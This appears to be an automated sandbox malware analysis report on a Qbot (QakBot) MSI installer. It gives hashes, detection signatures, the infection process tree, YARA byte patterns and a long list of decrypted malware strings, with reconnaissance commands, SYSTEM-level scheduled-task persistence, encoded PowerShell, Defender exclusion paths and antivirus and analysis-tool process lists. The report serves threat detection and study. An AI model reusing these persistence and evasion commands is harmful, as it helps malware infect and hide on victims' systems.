Windows Analysis Report
r3zg12.msi

Overview

General Information

Sample Name: r3zg12.msi
Analysis ID: 878465
MD5: 665afc8f8b7972f427fe1bd90d263032
SHA1: cc36e48f383750eb9416961b52ee3100b6e30688
SHA256: d764436caf7114d880f982d208bd9514a433772dcac851f27c510d1597e26edd
Tags: msi

Detection

Qbot
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Qbot
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
C2 URLs / IPs found in malware configuration
Sample uses string decryption to hide its real strings
Potentially malicious time measurement code found
AV process strings found (often used to terminate AV products)
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
Connects to several IPs in different countries
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Launches processes in debugging mode, may be used to hinder debugging
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • msiexec.exe (PID: 7048 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\r3zg12.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 1948 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • rundll32.exe (PID: 3156 cmdline: rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 676 cmdline: rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • wermgr.exe (PID: 4340 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • wscript.exe (PID: 6980 cmdline: wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup
Name: QakBot, qbot, Qbot
Description: QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.
Attribution: GOLD CABIN
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot
{"Bot id": "obama265", "Campaign": "1685436052", "Version": "404.1320"}
Source | Rule | Description | Author | Strings
00000004.00000002.374504814.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
00000004.00000002.374584964.0000000004AB0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
decrypted.memstr | JoeSecurity_Qbot | Yara detected Qbot | Joe Security

Source | Rule | Description | Author | Strings
4.2.rundll32.exe.2c90000.0.unpack | MAL_QakBot_ConfigExtraction_Feb23 | QakBot Config Extraction | kevoreilly
  • 0xeb71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
  • 0xa797:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
4.2.rundll32.exe.2c90000.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
4.2.rundll32.exe.2da0830.1.unpack | MAL_QakBot_ConfigExtraction_Feb23 | QakBot Config Extraction | kevoreilly
  • 0xdf71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
  • 0x9b97:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
4.2.rundll32.exe.2da0830.1.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
4.2.rundll32.exe.2da0830.1.raw.unpack | MAL_QakBot_ConfigExtraction_Feb23 | QakBot Config Extraction | kevoreilly
  • 0xeb71:$params: 8B 7D 08 8B F1 57 89 55 FC E8 A0 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
  • 0xa797:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
            No Sigma rule has matched
            No Snort rule has matched

AV Detection

Source: 00000004.00000002.374504814.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Qbot {"Bot id": "obama265", "Campaign": "1685436052", "Version": "404.1320"}
Source: 4.2.rundll32.exe.2da0830.1.raw.unpack
String decryptor:
  • error res='%s' err=%d len=%u
  • netstat -nao
  • runas
  • ipconfig /all
  • SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
  • net localgroup
  • nltest /domain_trusts /all_trusts
  • %s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
  • Microsoft
  • SELF_TEST_1
  • p%08x
  • Self test FAILED!!!
  • Self test OK.
  • /t5
  • whoami /all
  • cmd
  • microsoft.com,google.com,cisco.com,oracle.com,verisign.com,broadcom.com,yahoo.com,xfinity.com,irs.gov,linkedin.com
  • ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
  • route print
  • .lnk
  • "%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
  • arp -a
  • %s "$%s = \"%s\"; & $%s"
  • net share
  • cmd.exe /c set
  • Self check
  • %u;%u;%u;
  • /c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
  • ProfileImagePath
  • at.exe %u:%u "%s" /I
  • ProgramData
  • Self check ok!
  • powershell.exe
  • qwinsta
  • net view
  • nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
  • Component_08
  • Start screenshot
  • schtasks.exe /Delete /F /TN %u
  • appidapi.dll
  • %s \"$%s = \\\"%s\\\\; & $%s\"
  • c:\ProgramData
  • Component_07
  • bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN
  • powershell.exe -encodedCommand %S
  • ERROR: GetModuleFileNameW() failed with error: %u
  • powershell.exe -encodedCommand
  • SoNuce]ugdiB3c[doMuce2s81*uXmcvP
  • \System32\WindowsPowerShell\v1.0\powershell.exe
  • schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
  • Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
  • %u.%u.%u.%u.%u.%u.%04x
  • %SystemRoot%\SysWOW64\explorer.exe
  • SystemRoot
  • cscript.exe
  • MBAMService.exe;mbamgui.exe
  • %SystemRoot%\System32\xwizard.exe
  • %SystemRoot%\System32\wermgr.exe
  • AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
  • C:\INTERNAL\__empty
  • .dll
  • Win32_PhysicalMemory
  • ALLUSERSPROFILE
  • image/jpeg
  • LocalLow
  • displayName
  • Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
  • shlwapi.dll
  • %SystemRoot%\SysWOW64\WerFault.exe
  • CommandLine
  • {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
  • kernel32.dll
  • SubmitSamplesConsent
  • 1234567890
  • wbj.go
  • %SystemRoot%\SysWOW64\wextract.exe
  • Win32_DiskDrive
  • vkise.exe;isesrv.exe;cmdagent.exe
  • System32
  • Name
  • %SystemRoot%\System32\WerFault.exe
  • WRSA.exe
  • c:\\
  • reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
  • SpyNetReporting
  • FALSE
  • aswhookx.dll
  • Packages
  • SonicWallClientProtectionService.exe;SWDash.exe
  • application/x-shockwave-flash
  • Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
  • RepUx.exe
  • %SystemRoot%\System32\mspaint.exe
  • coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
  • Winsta0
  • Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
  • CynetEPS.exe;CynetMS.exe;CynetConsole.exe
  • %SystemRoot%\SysWOW64\wermgr.exe
  • %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
  • avp.exe;kavtray.exe
  • root\SecurityCenter2
  • %SystemRoot%\SysWOW64\backgroundTaskHost.exe
  • MsMpEng.exe
  • %SystemRoot%\System32\CertEnrollCtrl.exe
  • SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
  • userenv.dll
  • csc_ui.exe
  • frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
  • \\.\pipe\
  • pstorec.dll
  • NTUSER.DAT
  • from
  • %SystemRoot%\System32\sethc.exe
  • netapi32.dll
  • %SystemRoot%\System32\Utilman.exe
  • gdi32.dll
  • setupapi.dll
  • SELECT * FROM Win32_Processor
  • iphlpapi.dll
  • Caption
  • CrAmTray.exe
  • ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
  • SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
  • Win32_ComputerSystem
  • %SystemRoot%\System32\backgroundTaskHost.exe
  • %ProgramFiles%\Internet Explorer\iexplore.exe
  • SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
  • user32.dll
  • xagtnotif.exe;AppUIMonitor.exe
  • %SystemRoot%\System32\dxdiag.exe
  • SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
  • \sf2.dll
  • %SystemRoot%\SysWOW64\grpconv.exe
  • egui.exe;ekrn.exe
  • Software\Microsoft
  • %S.%06d
  • bcrypt.dll
  • SELECT * FROM AntiVirusProduct
  • %SystemRoot%\SysWOW64\SndVol.exe
  • %SystemRoot%\explorer.exe
  • %SystemRoot%\SysWOW64\Utilman.exe
  • SOFTWARE\Microsoft\Windows Defender\SpyNet
  • wtsapi32.dll
  • t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
  • %SystemRoot%\SysWOW64\xwizard.exe
  • shell32.dll
  • TRUE
  • Win32_Bios
  • SELECT * FROM Win32_OperatingSystem
  • %SystemRoot%\SysWOW64\mobsync.exe
  • c:\hiberfil.sysss
  • */*
  • %SystemRoot%\SysWOW64\AtBroker.exe
  • abcdefghijklmnopqrstuvwxyz
  • ByteFence.exe
  • type=0x%04X
  • snxhk_border_mywnd
  • ROOT\CIMV2
  • dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
  • https
  • fshoster32.exe
  • kernelbase.dll
  • regsvr32.exe
  • %s\system32\
  • %SystemRoot%\SysWOW64\dxdiag.exe
  • Content-Type: application/x-www-form-urlencoded
  • Win32_Process
  • rundll32.exe
  • LOCALAPPDATA
  • cmd.exe
  • APPDATA
  • select
  • .exe
  • SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
  • mcshield.exe
  • advapi32.dll
  • ws2_32.dll
  • .cfg
  • aabcdeefghiijklmnoopqrstuuvwxyyz
  • Win32_Product
  • WQL
  • wininet.dll
  • LastBootUpTime
  • S:(ML;;NW;;;LW)
  • %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
  • urlmon.dll
  • Create
  • Win32_PnPEntity
  • %SystemRoot%\System32\grpconv.exe
  • Initializing database...
  • %SystemRoot%\System32\SearchIndexer.exe
  • winsta0\default
  • .dat
  • WBJ_IGNORE
  • next
  • SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • %SystemRoot%\System32\AtBroker.exe
  • wpcap.dll
  • aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
  • %SystemRoot%\SysWOW64\sethc.exe
  • SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
  • image/pjpeg
  • fmon.exe
  • bdagent.exe;vsserv.exe;vsservppl.exe
  • %SystemRoot%\System32\SndVol.exe
  • vbs
  • aswhooka.dll
  • SysWOW64
  • %SystemRoot%\SysWOW64\mspaint.exe
  • mpr.dll
  • image/gif
  • crypt32.dll
  • avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
  • ntdll.dll
  • open
  • CSFalconService.exe;CSFalconContainer.exe
  • %SystemRoot%\System32\wextract.exe
  • %SystemRoot%\System32\mobsync.exe
  • %SystemRoot%\SysWOW64\SearchIndexer.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpackString decryptor: MBAMService.exe;mbamgui.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpackString decryptor: %SystemRoot%\System32\xwizard.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\System32\wermgr.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: C:\INTERNAL\__empty
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: .dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: Win32_PhysicalMemory
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: ALLUSERSPROFILE
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: image/jpeg
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: LocalLow
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: displayName
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: shlwapi.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\SysWOW64\WerFault.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: CommandLine
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: kernel32.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: SubmitSamplesConsent
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: 1234567890
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: wbj.go
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\SysWOW64\wextract.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: Win32_DiskDrive
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: vkise.exe;isesrv.exe;cmdagent.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: System32
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: Name
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\System32\WerFault.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: WRSA.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: c:\\
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: SpyNetReporting
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: FALSE
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: aswhookx.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: Packages
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: SonicWallClientProtectionService.exe;SWDash.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: application/x-shockwave-flash
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: RepUx.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\System32\mspaint.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: Winsta0
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\SysWOW64\wermgr.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: avp.exe;kavtray.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: root\SecurityCenter2
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: MsMpEng.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: userenv.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: csc_ui.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: \\.\pipe\
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: pstorec.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: NTUSER.DAT
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: from
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\System32\sethc.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: netapi32.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\System32\Utilman.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: gdi32.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: setupapi.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: SELECT * FROM Win32_Processor
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: iphlpapi.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: Caption
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: CrAmTray.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: Win32_ComputerSystem
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: user32.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: xagtnotif.exe;AppUIMonitor.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\System32\dxdiag.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: \sf2.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\SysWOW64\grpconv.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: egui.exe;ekrn.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: Software\Microsoft
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %S.%06d
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: bcrypt.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: SELECT * FROM AntiVirusProduct
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\SysWOW64\SndVol.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\explorer.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\SysWOW64\Utilman.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: wtsapi32.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\SysWOW64\xwizard.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: shell32.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: TRUE
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: Win32_Bios
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: SELECT * FROM Win32_OperatingSystem
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\SysWOW64\mobsync.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: c:\hiberfil.sysss
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: */*
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: abcdefghijklmnopqrstuvwxyz
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: ByteFence.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: type=0x%04X
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: snxhk_border_mywnd
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: ROOT\CIMV2
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: https
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: fshoster32.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: kernelbase.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: regsvr32.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %s\system32\
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: Win32_Process
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: rundll32.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: LOCALAPPDATA
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: cmd.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: APPDATA
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: select
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: .exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: mcshield.exe
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: advapi32.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: ws2_32.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: .cfg
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: Win32_Product
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: WQL
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: wininet.dll
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: LastBootUpTime
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: S:(ML;;NW;;;LW)
            Source: 4.2.rundll32.exe.2da0830.1.raw.unpack String decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_1000C0B0 mv_cast5_crypt2,4_2_1000C0B0
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_1000B0D0 mv_camellia_crypt,4_2_1000B0D0
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_10013100 mv_encryption_init_info_alloc,mv_mallocz,mv_mallocz,mv_mallocz,mv_mallocz,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_calloc,4_2_10013100
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_1000C1B0 mv_cast5_crypt,4_2_1000C1B0
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_100132D0 mv_encryption_init_info_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,4_2_100132D0
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_10002480 mv_aes_ctr_crypt,mv_aes_crypt,4_2_10002480
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_10013480 mv_encryption_init_info_get_side_data,mv_encryption_init_info_alloc,mv_free,mv_free,mv_free,mv_free,mv_free,4_2_10013480
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_100084B0 mv_blowfish_crypt,mv_blowfish_crypt_ecb,mv_blowfish_crypt_ecb,4_2_100084B0
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_10032510 mv_get_random_seed,BCryptOpenAlgorithmProvider,BCryptGenRandom,BCryptCloseAlgorithmProvider,mvpriv_open,_read,_close,mvpriv_open,_read,_close,clock,clock,mv_sha_init,mv_sha_update,mv_sha_final,mv_log,abort,4_2_10032510
